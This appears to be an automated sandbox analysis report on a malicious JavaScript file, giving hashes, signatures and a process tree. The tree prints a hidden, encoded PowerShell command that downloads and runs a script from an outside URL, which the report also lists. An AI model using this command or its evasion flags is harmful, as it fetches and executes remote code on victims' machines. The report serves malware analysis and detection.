Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24/12/2023, 16:05
Static task
static1
Behavioral task
behavioral1
Sample
04d827ab4c6b0b98e8fe73d37a2a02c6.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
04d827ab4c6b0b98e8fe73d37a2a02c6.js
Resource
win10v2004-20231215-en
General
-
Target
04d827ab4c6b0b98e8fe73d37a2a02c6.js
-
Size
76KB
-
MD5
04d827ab4c6b0b98e8fe73d37a2a02c6
-
SHA1
a691e309c62f5be3d98a2c94cfe26c01974eece1
-
SHA256
95d2b043821761056ebdaf782d4f1e07ce2629c5e9d5ad64d02ff41dedc4f75b
-
SHA512
b10e61eb9a75fdf74f704a284ed27a49c452c783abc7c637c43ddcbf47a9bd1396ead74e315a5eefe5b0f8972f31359be46d41925c76ee1fab3b590ad9a5529e
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/o/:59Ry98guHVBqqg2bcruzUHmLKeMMU7Gx
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2876 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2876 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1752 wrote to memory of 2360 1752 wscript.exe 28 PID 1752 wrote to memory of 2360 1752 wscript.exe 28 PID 1752 wrote to memory of 2360 1752 wscript.exe 28 PID 2360 wrote to memory of 2876 2360 cmd.exe 30 PID 2360 wrote to memory of 2876 2360 cmd.exe 30 PID 2360 wrote to memory of 2876 2360 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\04d827ab4c6b0b98e8fe73d37a2a02c6.js1⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-